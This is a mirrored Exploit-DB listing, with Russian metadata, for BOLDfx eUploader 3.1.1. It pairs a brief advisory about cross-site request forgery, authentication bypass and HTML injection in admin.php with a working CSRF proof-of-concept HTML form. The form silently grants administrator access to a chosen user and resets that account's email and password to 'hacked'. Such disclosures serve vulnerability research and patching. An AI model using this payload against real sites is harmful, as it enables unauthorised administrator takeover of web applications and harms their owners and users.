- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34351
- Проверка EDB
-
- Пройдено
- Автор
- MILOS ZIVANOVIC
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-16
BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities
HTML:
source: https://www.securityfocus.com/bid/41783/info
BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request-forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.
Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.
eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form>- Источник
- www.exploit-db.com
